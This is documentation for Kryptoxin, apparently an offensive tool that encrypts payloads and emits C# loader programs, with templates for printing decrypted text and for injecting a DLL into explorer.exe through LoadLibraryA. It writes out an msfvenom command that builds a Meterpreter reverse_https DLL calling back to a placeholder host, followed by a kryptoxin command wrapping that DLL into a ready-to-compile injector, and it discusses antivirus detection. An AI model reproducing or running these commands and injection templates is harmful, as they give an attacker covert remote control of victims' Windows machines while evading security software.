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C# (.NET)

Kryptoxin supports the C# programming language as an output language for templates.


The C# language is very valuable in the security field, as it provides access to the .NET framework capabilities. Managed programs and DLLs can be written to perform system API calls while granting access to more sophisticated functions such as AES decryption.

All templates shipped with Kryptoxin can be directly pasted into Visual Studio (we recommended versions >= 2022) and be compiled without modification.

This basic console program simply prints the UTF-8 encoded text encrypted by Kryptoxin. It uses the System.Security.Cryptography .NET class, which is widely supported by current Windows hosts.

python -m kryptoxin encrypt -k s3cret --random-iv --random-salt \
--alg AES --key_size 192 --iter 5000 --lang csharp --action print
using System.Security.Cryptography;

class Program // (1)!


    static void Main(string[] args) // (2)!
  1. The class generated must be imported in a C# .NET Console Program project.
  2. The main entry point is Main(), the latter will call the decoding and decryption routines.

DLL Process Injection (load-library)

This .NET console program injects a DLL such as those generated by the metasploit's msfvenom utility into the explorer.exe process.

The input library must be crafted with a special DllMain() function

The dynamic-linked library passed in input must be specially crafted with a DllMain() function. The process injection method in this program uses the system's LoadLibraryA() Win32 API function, which call the above function when loading a library.

The .DLL file is written to the target's disk unencrypted

This C# console program uses the LoadLibraryA() Windows API function, which require a library file stored on the disk. Therefore it will write the decrypted DLL onto the host's hard disk, allowing for potential anti-virus detection.

The example below encrypt the msf.dll generated by msfvenom and output a C# console program source code that can be readily pasted into a Microsoft Visual Studio project.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=w.x.y.z LPORT=443 \
EXITFUNC=thread -f dll -o msf.dll
python -m kryptoxin encrypt -k 123456 --random-iv --random-salt \
--lang csharp --action load-dll --in msf.dll --dllname=aton32.dll \